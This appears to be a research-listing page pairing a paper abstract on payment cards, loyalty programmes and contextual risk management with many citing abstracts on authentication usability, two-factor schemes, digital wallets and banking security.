Electronic card payments are getting more and more popular, mainly because of their simplicity, convenience, processing time and high level of security. The fact that a single payment card is issued for a particular cardholder makes it possible to link a card to various services. In this paper, we investigated a usage of a payment card in the loyalty program that incorporates our Contextual Risk Management System (CRMS) to assure a novel intangible reward: Shorter transaction processing time. In the beginning, we emphasize the importance of soft benefits in modern loyalty programs and recall the risk management algorithms and the reputation system that has been used in the CRMS. Then, using an extensive dataset of 2.5 million payment transaction traces (collected within a year from 68 terminals) we estimate potential benefits for merchants and cardholders and try to predict an effect of this system for the future. We also discuss the impact of this system on the real and user-perceived security level.
... Finally, only few of the respondents (27.1%) worked in organisations such that allowed staff to store official document in their personal cloud. It is necessary to posit that evidence suggests a trade-off between security and convenience and technology users are initially inclined to choose a convenient option as against a secure option - (Kim & Park, 2012;Weir, Douglas, Carruthers, & Jack, 2009). It appears from the data that some of the organisations were more concerned about security than the convenience of technology use of their staff. ...
Article
Full-text available
The study was conducted to identify social media, mobile and cloud (SoMoClo) technologies used by Nigerian professional accountants. It also performed predictive analysis of Accountants' Training Framework (ATF) and Perception (PCT) on professional accountants' use of SoMoClo technologies. Using survey design, the study administered an online questionnaire among professional accountants in Nigeria. Some items in the survey were taken from already validated items in literature especially from popular theories of technology use. Data were analysed using both descriptive statistics (frequency, mean, mode, and standard deviation) and inferential statistics – binary logistic regression. Findings showed that Nigerian professional accountants claim to proficiently use SoMoClo technologies in their professional capacities. ATF and PCT contributed (in)significantly to the prediction of self-reported use of and intention to use SoMoClo technologies among Nigerian professional accountants. The overarching disruptive and transformative tendencies and evidences of technology is an incentive for professional accountants to constantly unlearn, relearn, initiate, adopt and adjust to emerging trends in the practice of their profession. This study brings to bare the significance of the ATF as a predictor variable for use of technology. A new model for the measurement of “use” – willingness, readiness and ableness (WRA) framework – was tested.
... An exemplary situation of this would be the OTP code verification that consumers are required to do in order to complete their payment transactions. Authentication significantly impacts on consumer experience, which impacts their digital wallet adoption decision [52]- [54]. Because confidence is a significant influencing factor, digital wallet companies must guarantee that relevant aspects such as authentication are adequately regulated to build customer confidence [55]. ...
Article
Full-text available
This study aimed to determine an efficient framework that caters to the security and consumer satisfaction for digital wallet systems. A quantitative online survey was carried out to test whether the six factors (i.e., transaction speed, authentication, encryption mechanisms, software performance, privacy details, and information provided) positively or negatively impact customer satisfaction. This questionnaire was divided into two sections: the respondents’ demographic data and a survey on security factors that influence customer satisfaction. The questionnaires were distributed to the National University of Malaysia’s professors and students. A sample of 300 respondents undertook the survey. The survey results suggested that many respondents agreed that the stated security factors influenced their satisfaction when using digital wallets. Previous studies indicated that financial security, privacy, system security, cybercrime, and trust impact online purchase intention. The proposed framework in this research explicitly covers the security factors of the digital wallet. This study may help digital wallet providers understand the customer's perspective on digital wallet security aspects, therefore motivating providers to implement appropriately designed regulations that will attract customers to utilize digital wallet services. Formulating appropriate security regulations will generate long-term value, leading to greater digital wallet adoption rates.
Article
Purpose Although the use of online authentication systems in banking services is expanding globally, little is known about cultural differences in forming consumers' responses to these services. This paper examines how the usability of an online security service and culture impact consumers' behaviour. Design/methodology/approach The authors conduct a 2 (usability: high vs low) × 2 (culture: US vs Korea) between-subjects, full factorial design. Findings The results indicate a differential influence of the usability of a security system by culture. In particular, US consumers exhibit greater behavioural intention in a high (vs low) usability condition, whereas Korean consumers showed more favourable responses in a low-usability condition. Moreover, perceived effort is confirmed as a crucial mediator that explains the psychological mechanism of the proposed effect. Practical implications This research contributes to the literature on online banking where security is an important determinant of success. Especially for managers involved in international banking services, the findings of cultural differences offer insights about the importance of local understanding and differentiation of bank services for specific target markets which can enhance consumers' response towards an online security service. Originality/value The current study is one of a very few attempts to examine the role of usability of an online security system in forming consumers' behavioural intention. More importantly, this study integrates the concept of culture to explain how usability influences positive or negative behavioural intention in an international market.
Conference Paper
While second factor authentication (2FA) is now widely available, user adoption is still very low, as most of 2FA implementations require significant interaction from the user. In this paper, we present a novel 2FA system, called Wi-Auth that requires minimal participation from the user. A user after confirming her credentials with an online service, simply has to place a pre-registered secondary device in close proximity (< 2.5 inches) of the primary device from which the login attempt is being made. Wi-Auth detects the proximity of these two devices by comparing the fine-grained Channel State Information (CSI) of the ambient WiFi signals measured at the two devices. The logic being that two devices that are in such close proximity will exhibit very similar CSI characteristics. Wi-Auth uses a lightweight two-step matching algorithm to compare the two CSI measurements. We also address (for the first time in literature) the issue of targeted attacks where an attacker may be co-located with the victim. We implement Wi-Auth using commodity off-the-shelf 802.11n devices and evaluate its performance in three different practical settings including an open office, an apartment and a large meeting space. Our experiments performed at 90 different location reveal that Wi-Auth can on average achieve 94% authentication accuracy with 5% false positives and 6% false negatives. Moreover, Wi-Auth is very robust in preventing co-located attacks with a 95% attack detection accuracy.
Article
A popular information security-related motivation theory is the Protection Motivation Theory (PMT) that has been studied extensively in many information security contexts with promising results. However, prior studies have found inconsistent findings regarding the relationships within PMT. To shed light on these inconsistent findings, we introduce the attitudinal ambivalence theory to open the black box within PMT. We tested our model on data collect ed from 1,383 individuals facing potential cyberattacks of their emails in a field experiment. The results of polynomial regression with response surface analysis showed that attitudinal ambivalence is generated from the opposition between an individual’s evaluations of maladaptive rewards and social norms (i.e., descriptive norm and subjective norm). This attitudinal ambivalence, in turn, affects individuals’ evaluations of their coping appraisal process and protection motivation, and ultimately protection behavior. We discuss the theoretical and managerial implications of identifying the determinants and outcomes of attitudinal ambivalence in the information security context. From a theoretical standpoint, our work contributes to the information security literature by incorporating attitudinal ambivalence, which arises from the intrapersonal and interpersonal appraisal processes, into PMT. From a practical standpoint, our work provides insights into designing effective fear appeals to avoid triggering attitudinal ambivalence and thus encouraging adoption of security protection behavior.
Chapter
The chapter starts with discussing how hacker's demography and their culture have been changing over the years. Then it proceeds with presenting hacking attacks, techniques, and tools as well as anti‐hacking protection mechanisms. In the second part, it moves to the ordinary user's profiles and authentication. Here we show how to employ data science and statistical approaches to find out and analyze user's characteristics and their influence on the security level of their computer practice. The chapter presents the computer device security evaluation procedures. It discusses how to conduct analysis, observations, results, and recommendations for users to improve their overall security practices and the security of their devices. Also, it examines the hacking web fingerprinting attacks against the privacy protection TOR technology that utilizes machine learning as well as possible protection mechanisms. Examples and use cases are included.
Conference Paper
Most two-factor authentication (2FA) implementations rely on the user possessing and interacting with a secondary device (e.g. mobile phone) which has contributed to the lack of widespread uptake. We present a 2FA system, called Wi-Sign that does not rely on a secondary device for establishing the second factor. The user is required to sign at a designated place on the primary device with his finger following a successful first step of authentication (i.e. username + password). Wi-Sign captures the unique perturbations in the WiFi signals incurred due to the hand motion while signing and uses these to establish the second factor. Wi-Sign detects these perturbations by measuring the fine-grained Channel State Information (CSI) of the ambient WiFi signals at the device from which log-in attempt is being made. The logic is that, the user's hand geometry and the way he moves his hand while signing cause unique perturbations in CSI time-series. After filtering noise from the CSI data, principal component analysis is employed for compressing the CSI data. For segmentation of sign related perturbations, Wi-Sign utilizes the thresholding approach based on the variance of the first-order difference of the selected principal component. Finally, the authentication decision is made by feeding scrupulously selected features to a One-Class SVM classifier. We implement Wi-Sign using commodity off-the-shelf 802.11n devices and evaluate its performance by recruiting 14 volunteers. Our evaluation shows that Wi-Sign can on average achieve 79% TPR. Moreover, Wi-Sign can detect attacks with an average TNR of 86%.
Chapter
One Time Password (OTP) is the most prevalent 2FA method among users and service providers worldwide. It is imperative to assess this 2FA scheme’s security from multiple perspectives, considering its ubiquitous presence in the user’s day-to-day activities. In this work, we assess the security of seven commercially deployed OTP-2FA schemes against malware in the terminal attack model without compromising any 2FA device or authentication services. To implement this attack scenario, we develop a combination of attack modules that will capture password and OTP in different ways during the user’s login attempt. At the same time, it would originate a fresh concurrent hidden session from within the terminal or remotely to get possession to the user account without compromising the service or network or any external device. We examine implemented attack against seven different popular public services, which mostly use two variants of OTP-2FA and observed that almost all of them are vulnerable to this attack. Here, the threat model is practical as the attack components can be installed in the user’s terminal without any root/administrator privilege. Moreover, the attack modules require a small number of resources to run. The whole procedure would run from the background that makes the attack very hidden in nature and attain low detectability after examining against prominent anti-malware programs that indicate a real-world threat. Our findings after the analysis of the OTP-2FA schemes indicate that an adversary who can install malware on the user’s terminal can defeat almost all popular and widely used OTP-2FA schemes, which are vital security components of online accounts and secure financial transactions. The result also points out that the OTP-2FA scheme does not add extra security on top of the password in the presence of the malicious program in the terminal.
Article
Purpose The purpose of this study is to gain more insight into the impact of cybercrime incidents in the banking sector of Pakistan. This study investigates the significant contribution of information security awareness on the relationship of cybercrimes and organizational performance. Design/methodology/approach The impact of cybercrime incidents on organizational performance is investigated by further exploring the moderating effects of information security awareness. A sample of 302 employees in the banking industry of Pakistan was studied by using survey design. Findings Cybercrime incidents have negative impact on organizational performance but information security awareness weakens the negative impact of cybercrimes on organizational performance Research limitations/implications The present study focus on banking sector so its finding cannot be generalizes in other sectors. Further in depth comparative studies in other sectors with different cultural settings will help to authenticate the research findings. Practical implications Information security awareness weakens the negative impact of cybercrimes on organizational performance, therefore it is important for banks’ HR managers to set up more security training courses to increase employees’ awareness on cybercrimes. Originality/value This study explores the impact of cybercrimes on banks’ performance with the moderating role of employees’ information security awareness. Linking these topics has created a new study within the cybercrimes discipline. The present study also enhances the understanding of employees’ role to combat the impact of cybercrimes on organizational performance.
Chapter
Prior research on privacy protective behaviors has found that online users irrationally trade protection for convenience, and so act against their own privacy preferences. The present article uses expectancyconfirmation theory (ECT) models to explain the continuance behavioral intentions of online users toward privacy-protection practices. It redefines convenience to highlight human behaviors involved in various stages of implementing privacy practices processes. The results show that earlier privacy practice experiences impact the present as well as the future protective behaviors of users, and that convenienceorientation is an important aspect of human nature that should not be inhibited by complex privacy practices. Therefore, to serve online users better, both researchers and practitioners should consider the personal perceptions of convenience of online users when constructing their privacy practices.
Article
To eradicate financial fraud, governments encourage the digitization of financial transactions, which is also reinforced by the digital economy paradigm. Recently, there has been an exponential increase in the number of e-transactions, and the incidence of cyber crimes related to online transaction fraud has also been increasing. To prevent online transaction fraud, the stakeholders of financial-transaction-related companies have implemented various secured authentication and authorization practices at all levels. In this paper, an additional factor for secure authentication for online transactions has been proposed. A third authentication factor, in addition to Personal Identification Number (PIN) and one time password (OTP), has been proposed, which is based on the global positioning system (GPS) location of the user who initiates the transaction. The strategy is to approve / decline the transaction based on a specified distance constraint between the transaction device and the user’s mobile device; this distance is used as an additional authentication factor (third factor) to verify the online transaction. The main objective of this study is to prevent fraudsters from performing online transactions from devices that do not belong to the user and are not currently in the possession of the user. The simulation results show that a high detection rate, i.e., 98.55%, is obtained using the proposed method.
Article
Social context is a vital component of Human-Computer Interaction (HCI) design for security; however, there is little discussion about how to provide security functions based on the social context. This study examines the fit between security design and social contexts in mobile payment applications by investigating preferences and perceptions of security design based on the task-technology fit model and the technology acceptance model. To approach fit of security design in different social contexts, this study followed the approach proposed by design science research and employed a full factorial design experiment. We developed two interfaces—a customizable interface without feedback information and a customizable interface with feedback information—and asked participants to modify security settings in the interfaces according to social contexts, conduct payment transactions, and report their perceptions of security and usability in four payment scenarios. The observed behaviors in relation to security settings and perceptions revealed the fit for security settings and feedback design in different social contexts. Implications were provided to allow insights for security design in mobile payment transactions according to social contexts.
Thesis
Full-text available
Seit seiner Einführung besticht das deutsche Onlinebanking mit der Sicherheit einer Zwei-Faktor-Authentifizierung. Obwohl für den Zugang zum Onlinebanking Benutzerkennung und Passwort genügen, müssen Transaktionen durch einen zusätzlichen Faktor bestätigt werden. Zu diesem Zweck fordert die Bank traditionell die Eingabe einer Transaktionsnummer, die der Kunde mithilfe seines Sicherungsverfahrens erhält. Das kontinuierliche Festhalten an dieser Trennung von Transaktionsauslösung und -bestätigung war dabei von einer anhaltenden Verbesserung der Sicherheitseigenschaften der Legitimierungsverfahren begleitet. Dieser Trend droht sich mit der Verfügbarkeit von Smartphones und Tablets jedoch umzukehren und führt im Privatkundengeschäft der Banken zu deutlichen Nutzungs- und Marktverschiebungen. Denn alte wie neue Finanzdienstleister adaptieren eine Strategie, die möglichst alle Prozesse auf innovative Art und Weise durch das Mobilgerät des Kunden abbilden soll. Diese als Mobilebanking bezeichnete Entwicklung begründet nicht nur die Einführung von Banking-Apps und App-basierten Legitimierungsverfahren, sondern auch ein völlig neues Authentifizierungsparadigma, das es im Kontrast zum klassischen Onlinebanking erstmalig ermöglicht, alle Bankgeschäfte von ein und demselben mobilen Endgerät auszulösen und zu bestätigen. Die Dissertation beschäftigt sich mit den Sicherheitsimplikationen, die sich durch das Aufkommen des Mobilebankings ergeben. Hierbei wird in der Arbeit zunächst festgestellt, dass sich mehr Angriffsmöglichkeiten durch Schadprogramme ergeben, als dies bisher der Fall war. Im Zentrum stehen zwei Angriffe: Erstens erlaubt die Softwareimplementierung dem Angreifer, einen Replikationsangriff durchzuführen, bei dem das App-basierte Legitimierungsverfahren in vollem Umfang auf ein unautorisiertes Gerät kopiert wird. Zweitens wird durch die fehlende Medientrennung zwischen Auslösung und Bestätigung die Echtzeitmanipulation einer nutzerinitiierten Transaktion möglich. Beide Angriffe fußen auf konzeptionellen Defiziten, die darauf zurückzuführen sind, dass die Mobilebanking-Verfahren ohne adäquate Hardwaremöglichkeiten zur Absicherung eingeführt wurden. Aus diesem Grund versuchen die Banken ihre Apps durch kommerzielle Härtungsprodukte auf Softwareebene zu schützen. Weiterführende Untersuchungen zeigen solchen Lösungen jedoch klare Grenzen auf und machen deutlich, dass auch sie die konzeptionellen Defizite nicht ausgleichen können. Während den etablierten Banken damit zumindest attestiert werden kann, das strukturelle Sicherheitsrisiko zu kennen und adressieren zu wollen, reichen die Probleme bei neuen Marktteilnehmern weiter. Forschungen im Rahmen dieser Dissertation haben bei dem derzeit führenden deutschen Finanz-Start-up gravierende Sicherheitsmängel identifiziert, die ihre Ursache in einer mangelnden Priorität der IT-Sicherheit finden. Die ermittelten Defizite sind auch in Bezug auf regulatorische Vorgaben zur Sicherheit mobiler Finanzlösungen relevant. Im Rahmen der Zahlungsdiensterichtlinie II hat die Europäische Union Vorgaben auf den Weg gebracht, die ab dem 14. September 2019 in Geltung treten. Die Dissertation beschäftigt sich in diesem Zusammenhang damit, welche Anforderungen an die Sicherheit digitaler Transaktionen allgemein zu stellen sind und konstatiert im Vergleich mit den rechtlichen Vorgaben weitgehende Kompatibilität. Weiterer Untersuchungsgegenstand ist die Richtlinienkonformität gängiger Sicherungsverfahren im Online- und Mobilebanking. Neben der Nichtkonformität listenbasierter Verfahren legt die Arbeit auch eine Unzulänglichkeit von Verfahren auf Basis des SMS-Telekommunikationsdienstes sowie unter der Verwendung von App-basierten Methoden nahe. Obwohl die Richtlinie für eine Erhöhung des Sicherheitsniveaus bei Bankgeschäften sorgt, identifiziert die Abhandlung weitere Schwachstellen im Transaktionsprozess, die von der Regulierung nicht erfasst werden und ihre Ursache auch in menschlichen Faktoren finden. Die Arbeit setzt sich deshalb in einer Nutzerstudie mit der praktischen Sicherheit von Transaktionen beim Onlinebanking auseinander. Die Studie kommt zum Schluss, dass die Teilnehmer sich oft nicht im Klaren sind, welche Schritte für die Sicherheit essentiell sind, weshalb sie Transaktionsdaten gar nicht oder nur fehlerhaft prüfen. Die Banken sind dabei Teil des Problems, da sie dem Kunden mitunter irreführende Informationen zur Verfügung stellen. Die Ergebnisse dieser Arbeit haben aufgrund ihrer angewandten Natur neben der Forschung auch Relevanz für die Öffentlichkeit sowie die Aufsichtsbehörden. Viele Beiträge der Dissertation wurden durch die Presse rezipiert, wodurch ein Sicherheitsbewusstsein für Bankgeschäfte in der Gesamtbevölkerung gefördert wird. Darüber hinaus stellt auch das Bundesamt für Sicherheit in der Informationstechnik die Bedeutung der Arbeit heraus, indem Teile davon Erwähnung im Bericht zur Lage der IT-Sicherheit in Deutschland für das Jahr 2018 fanden.
Article
Password authentication is still ubiquitous although alternatives have been developed to overcome its shortcomings such as high cognitive load for users. Using an objective rating scheme Bonneau et al. (2012) demonstrated that replacing the password poses a quest that yet remains unsolved. To shine light on this intractable issue we turn towards subjective user perceptions that influence acceptance and actual use of authentication schemes. We first conducted an extensive rating of objective features of authentication schemes to inform our selection of schemes for this research. Building on the findings thereof, 41 users interacted with twelve different authentication schemes in a laboratory study. The participants’ ratings revealed that the password followed by fingerprint authentication scored highest in terms of preference, usability, intention to use and lowest in terms of expected problems and effort. Usability and effort seem to be important factors for users’ preference rating whereas security and privacy ratings were not correlated with preference. One reason for these factors to fall behind might be their opacity and the resulting difficulty to evaluate them from a user perspective. Further, security and usability perceptions deviated from objective factors and should therefore be carefully considered before making decisions in terms of authentication. Suggestions for making security and privacy features more tangible and to allow for an easier integration in the users’ decision process are discussed.
Article
Full-text available
Purpose: Social media marketing has expanded drastically over the years; despite that, B2B organizations have been unable to use, adapt, and utilize social media marketing, in comparison to B2C (Business to Consumer) organizations. The study intends to examine the antecedents of social media marketing in Business to Business organizations. Methodology: The hypotheses were tested through a survey conducted with 375 employees, belonging to 16 different B2B industries in Pakistan. Reliability analysis, convergent validity, discriminate validity, regression analysis, and mediation tests were carried out to measure the reliability of the measures and examine the proposed hypotheses. Findings: Findings supported the research model and proposed hypotheses. Results suggested a significant influence of learnability, memorability, perceived barriers, perceived usability, and perceived usefulness on actual use in B2B organizations. Findings also confirm the mediating roles of perceived usability and usefulness in the framework. Practical Implications: Usage and adoption of social media marketing in B2B organizations can be improved if they invest in training programs that facilitate learning and memorability of social media tools. Perceived barriers can be eliminated if companies can reassure employees of the relevance and efficiency of social media marketing in their business environment. Keywords: B2B, Business to Business, Industrial Marketing, Social media, TAM
Article
We present a secure two-factor authentication (TFA) scheme based on the user’s possession of a password and a crypto-capable device. Security is “end-to-end” in the sense that the attacker can attack all parts of the system, including all communication links and any subset of parties (servers, devices, client terminals), can learn users’ passwords, and perform active and passive attacks, online and offline. In all cases the scheme provides the highest attainable security bounds given the set of compromised components. Our solution builds a TFA scheme using any Device-enhanced Password-authenticated Key Exchange (PAKE), defined by Jarecki et al., and any Short Authenticated String (SAS) Message Authentication, defined by Vaudenay. We show an efficient instantiation of this modular construction, which utilizes any password-based client-server authentication method, with or without reliance on public-key infrastructure. The security of the proposed scheme is proven in a formal model that we formulate as an extension of the traditional PAKE model. We also report on a prototype implementation of our schemes, including TLS-based and PKI-free variants, as well as several instantiations of the SAS mechanism, all demonstrating the practicality of our approach. Finally, we present a usability study evaluating the viability of our protocol contrasted with the traditional PIN-based TFA approach in terms of efficiency, potential for errors, user experience, and security perception of the underlying manual process.
Article
Full-text available
Despite concerns raised by practitioners, the potential downside of the information security demands imposed by organizations on their employees has received limited scholarly attention. Our research focuses on information security fatigue (hereafter security fatigue), which is defined as a socio‐emotional state experienced by an individual who is tired of and disillusioned with security policies and their associated guidelines and procedures. This research delves into the security fatigue concept, investigates its antecedents and reports how fatigue affects employee security policy compliance (and non‐compliance). Since security fatigue is not well articulated in the literature and there is limited understanding of its antecedents and consequences, we take a research approach that affords novel insight into this phenomenon. Specifically, we conduct 38 in‐depth interviews with business and IT professionals, and then use a qualitative approach to construct a model, including seven research propositions, to highlight the key aspects of security fatigue. Our results indicate that four distinct antecedents contribute to security fatigue, which result in three unique consequences. We discuss security fatigue in relation to past theoretical views and related concepts within the security policy compliance literature and identify directions for future research.
Article
Full-text available
Two-factor authentication (2FA) is a recommended or imposed authentication mechanism for valuable online assets. However, 2FA mechanisms usually exhibit user experience issues that create user friction and even lead to poor acceptance, hampering the wider spread of 2FA. In this paper, we investigate user perceptions of 2FA through in-depth interviews with 42 participants, revealing key requirements that are not well met today despite recently emerged 2FA solutions. First, we investigate past experiences with authentication mechanisms emphasizing problems and aspects that hamper good user experience. Second, we investigate the different authentication factors more closely. Our results reveal particularly interesting preferences regarding the authentication factor ”ownership” in terms of properties, physical realizations, and interaction. These findings suggest a path towards 2FA mechanisms with considerably better user experience, promising to improve the acceptance and hence, the proliferation of 2FA for the benefit of security in the digital world.
Chapter
In this paper, the authors compare the usability of SMS mobile banking and automated IVR telephone banking. Participants (N = 116) used SMS banking and IVR banking to find their account balance in a repeated-measures experiment. IVR banking scored higher for usability metrics: effectiveness, attitude, and quality. There was no clear difference in rank order of preference between the two channels. Participants gave positive comments regarding speed and efficiency with SMS banking, but had serious doubts over the security of the SMS channel, impacting consumer trust in SMS banking. The authors argue that usability problems and security concerns are a major factor in the low adoption of SMS mobile banking. Older users were less positive in general to SMS banking compared with the more established IVR banking. Older users had lower first time completion rates for SMS banking and gave IVR banking higher attitude and quality scores.
Article
While mobile payment services have been flourishing in China, users have continually questioned the security of these transactions. Although customization has been proposed as a vital factor for mobile commerce, minimal knowledge exists regarding how it affects users’ perceived security in mobile payment transactions. A quantitative diary study was therefore conducted to provide insight into the personality traits that motivate customization behaviors in security, and how such behaviors influence perceived security under different use contexts in relation to mobile payments. First, an instrument for the diary study was developed through an interview. Then, 134 responses from mobile payment users were used to examine the relationships between personality traits and customization behaviors. Among them, the diary was completed by 67 mobile payment users who reported their perceived security for 1094 recoded payment events across various use contexts for periods ranging between 5 and 15 days. The results showed that the personality traits of extraversion and intellect influence users’ customization behaviors and these behaviors have a positive effect on perceived security. Additionally, the relationship between customization behaviors and perceived security was moderated by the task and technical contexts. Based on these findings, design implications and opportunities for mobile payment services are described.
Article
App stores provide access to millions of different programs that users can download on their computers. Developers can also make their programs available for download on their websites and host the program files either directly on their website or on third-party platforms, such as mirrors. In the latter case, as users download the software without any vetting from the developers, they should take the necessary precautions to ensure that it is authentic. One way to accomplish this is to check that the published file’s integrity verification code—the checksum—matches that (if provided) of the downloaded file. To date, however, there is little evidence to suggest that such a process is effective. Even worse, very few usability studies about it exist. In this article, we provide the first comprehensive study that assesses the usability and effectiveness of the manual checksum verification process. First, by means of an in-situ experiment with 40 participants and eye-tracking technology, we show that the process is cumbersome and error-prone. Second, after a 4-month-long in-the-wild experiment with 134 participants, we demonstrate how our proposed solution—a Chrome extension that verifies checksums automatically—significantly reduces human errors, improves coverage, and has only limited impact on usability. It also confirms that, sadly, only a tiny minority of websites that link to executable files in our sample provide checksums (0.01%), which is a strong call to action for web standards bodies, service providers, and content creators to increase the use of file integrity verification on their properties.
Chapter
Full-text available
Security experts frequently refer to people as “the weakest link in the chain” of system security. Famed hacker Kevin Mitnick revealed that he hardly ever cracked a password, because it “was easier to dupe people into revealing it” by employing a range of social engineering techniques. Often, such failures are attributed to users’ carelessness and ignorance. However, more enlightened researchers have pointed out that current security tools are simply too complex for many users, and they have made efforts to improve user interfaces to security tools. In this chapter, we aim to broaden the current perspective, focusing on the usability of security tools (or products) and the process of designing secure systems for the real-world context (the panorama) in which they have to operate. Here we demonstrate how current human factors knowledge and user-centered design principles can help security designers produce security solutions that are effective in practice.
Article
Full-text available
The e-government paradigm became an essential path for governments to reach citizens and businesses and to improve service and public performance. One of the important tools used in political and administrative venues is e-voting, where ICT tools are used to facilitate the process of voting for electing representatives and making decisions. The integrity and image of such applications won't be maintained unless strict measures on security and authenticity are applied. This chapter explores the e-voting process, reviews the authentication techniques and methods that are used in this process and proposed in the literature, and demonstrates few cases of applying e-voting systems from different countries in the world. Conclusions and proposed future work are stated at the end of the chapter.
Article
Full-text available
Recent results from usability studies of security systems have shown that end-users find them difficult to adopt and use. In this paper we argue that improving the usability of security technology is only one part of the problem, and that what is missed is the need to design usable and useful systems that provide security to end-users in terms of the applications that they use and the tasks they want to achieve. We propose alternate ways of building and integrating security technologies into applications and usability methods for evaluating how successful our prototypes are. We believe that the end results of designing usable and useful (from the end-user perspective) systems will be secure applications which will reflect the needs of users who are increasingly using computers away from the office and in a wider variety of networked configurations.
Article
Full-text available
This paper examines the current trends in the e-commerce revolution that has set in motion in the Malaysian banking sector and reports on an empirical research that was carried out in Malaysia to study the customers’ preference for electronic banking and the factors, which they considered influenced the adoption of electronic banking. Results based on the analysis of data relating to 300 respondents indicate that while there is no significant differences between the age and educational qualifications of the electronic and conventional banking users, some differences exists on other demographic variables. Analysis further reveals that accessibility of Internet, a wareness of e-banking, and customers’ reluctance to change are the factors that significantly affected the usage of e-banking in Malaysia. The paper discusses on the implications of these. Limitations of the study are highlighted and further research directions are suggested.
Conference Paper
Full-text available
Understanding the relation between usability measures seems crucial to deepen our conception of usability and to select the right measures for usability studies. We present a meta-analysis of correlations among usability measures calculated from the raw data of 73 studies. Correlations are generally low: effectiveness measures (e.g., errors) and efficiency measures (e.g., time) have a correlation of .247 ± .059 (Pearson's product-moment correlation with 95% confidence interval), efficiency and satisfaction (e.g., preference) one of .196 ± .064, and effectiveness and satisfaction one of .164 ± .062. Changes in task complexity do not influence these correlations, but use of more complex measures attenuates them. Standard questionnaires for measuring satisfaction appear more reliable than homegrown ones. Measures of users' perceptions of phenomena are generally not correlated with objective measures of the phenomena. Implications for how to measure usability are drawn and common models of usability are criticized. Author Keywords
Article
Full-text available
This article classifies common Internet banking authentication methods regarding potential threats and their level of security against common credential stealing and channel breaking attacks, respectively. The authors present two challenge/response Internet banking authentication solutions, one based on short-time passwords and one certificate-based, and relate them to the taxonomy above. There further outline how these solutions can be easily extended for nonrepudiation (that is, transaction signing), should more sophisticated content manipulation attacks become a real problem. Finally, they summarize their view on future requirements for secure Internet banking authentication and conclude by referencing real-live implementations.
Article
The importance of password security which is considered as an essential form of user authentication both on the Internet and for internal organizational computing systems is discussed. Password protection schemes are used to protect relatively low-sensitivity systems such as access to online archives as well as highly sensitive corporate intranets or personal bank accounts. The growth of e-commerce has led to a huge increase in the numbers of passwords required by individual users, very often duplicated over and over throughout the Web. In such an environment, a password, and all the accounts it provides access to, can no more be secure than the weakest system using that password.
Article
Usability and context are often more important than the absolute effectiveness of authentication. It's why the simple password refuses to die, reports William Knight
Article
How to measure usability is an important question in HCI research and user interface evaluation. We review current practice in measuring usability by categorizing and discussing usability measures from 180 studies published in core HCI journals and proceedings. The discussion distinguish several problems with the measures, including whether they actually measure usability, if they cover usability broadly, how they are reasoned about, and if they meet recommendations on how to measure usability. In many studies, the choice of and reasoning about usability measures fall short of a valid and reliable account of usability as quality-in-use of the user interface being studied. Based on the review, we discuss challenges for studies of usability and for research into how to measure usability. The challenges are to distinguish and empirically compare subjective and objective measures of usability; to focus on developing and employing measures of learning and retention; to study long-term use and usability; to extend measures of satisfaction beyond post-use questionnaires; to validate and standardize the host of subjective satisfaction questionnaires used; to study correlations between usability measures as a means for validation; and to use both micro and macro tasks and corresponding measures of usability. In conclusion, we argue that increased attention to the problems identified and challenges discussed may strengthen studies of usability and usability research.
Article
Statements which have appeared in recent months about two-factor authentication are not just incorrect – they are irresponsible. Oversimplification of the October 2005 Federal Financial Institutions Examination Council (FFIEC) recommendations has recently lead to sensational headlines. Another view needs to be voiced.
Article
The need for securing online banking services by the banks using cheap, portable EMV-compliant smart card readers, in a bid to protect lucrative banking channel, is discussed. The token-based random number generator systems, such as those available form RSA and Activcard, generate one-time registration passwords and are popular in Sweden. The long-term solution for online authentication, is the use of portable EMV-compliant smart card readers that incorporate a challenge response capability. Some service providers, such as Sweden's Post Girot, plan to develop this solution by expanding their public key infrastructure to include EMV based web authentication.
Article
This chapter discusses the conduct of research to guide the development of more useful and usable computer systems. Experimental research in human-computer interaction involves varying the design or deployment of systems, observing the consequences, and inferring from observations what to do differently. For such research to be effective, it must be owned—instituted, trusted and heeded—by those who control the development of new systems. Thus, managers, marketers, systems engineers, project leaders, and designers as well as human factors specialists are important participants in behavioral human-computer interaction research. This chapter is intended as much for those with backgrounds in computer science, engineering, or management as for human factors researchers and cognitive systems designers. It is argued in this chapter that the special goals and difficulties of human-computer interaction research make it different from most psychological research as well as from traditional computer engineering research. The main goal, the improvement of complex, interacting human-computer systems, requires behavioral research but is not sufficiently served by the standard tools of experimental psychology such as factorial controlled experiments on pre-planned variables. The chapter contains about equal quantities of criticism of inappropriate general research methods, description of valuable methods, and prescription of specific useful techniques.
Article
This paper reports on a study investigating the strengths and weaknesses of questionnaires as software evaluation tools. Two major influences on the usefulness of questionnaire-based evaluation responses are examined: the administration of the questionnaire, and the background and experience of the respondent. Two questionnaires were administered to a large number of students in an introductory programming class. The questionnaires were also given to a group of more experienced users (including course proctors). Respondents were asked to evaluate the text editor used in the class along a number of dimensions; evaluation responses were solicited using a number of different question types. Another group of students received the questionnaire individually, with part of it presented on the computer; a third group also evaluated an enhanced version of the editor in followup sessions.
Article
This paper describes results of a usability study of contrasting user-interface designs for Internet Banking (eBanking). Two specific interface metaphors were compared in the first experiment, linear form filling and array editing interaction modes. Terminology in the interaction dialogue was compared in the second experiment, using typical banking language and a generic, plain language interface. This research aimed to perform usability evaluation and comparison of the alternative interface designs to illuminate the development of new eBanking services. This research involved sixty-one participants (Internet users and customers of the involved Bank) exploring the designs in controlled experiments involving hands-on experience. Banks are interested in ensuring their eBanking services are highly customer-centric and that the interface matches customer expectations in order to drive customers towards this lower cost channel. The results of the first experiment (N=32, where N indicates the number of participants in the cohort) concluded that the simple form-filling metaphor, taken from the traditional paper-based procedure, was generally more usable than a Spreadsheet metaphor. In the second experiment (N=29), it was found that although banking terminology was not completely understood across the cohort, the instructional language changes did not impact significantly on usability.
Article
The current Internet Banking (eBanking) marketplace is highly functionally convergent. Electronic statement (eStatement) functionality is an area of potential competitive advantage. This paper describes an experiment in which a group of bank customers (N = 182) undertook information retrieval tasks using three variants of eStatements functionality incorporated into a working eBanking prototype. The experiment examined how the eStatements service design could influence a customer’s desire to switch from paper statements to online delivery. Three different levels of functionality were assessed for usability and for their impact on the customer’s willingness to switch from paper to eStatements. The methodology of the experimental approach utilised in this research is described. The results provide detailed data to inform the interface design and business case for eStatements. Usability and propensity to switch away from paper were significantly correlated. The data confirm that provision of a functionally sophisticated search engine offers high usability perceptions and scope for significant levels of switching from paper to online statements with associated costs savings.
Article
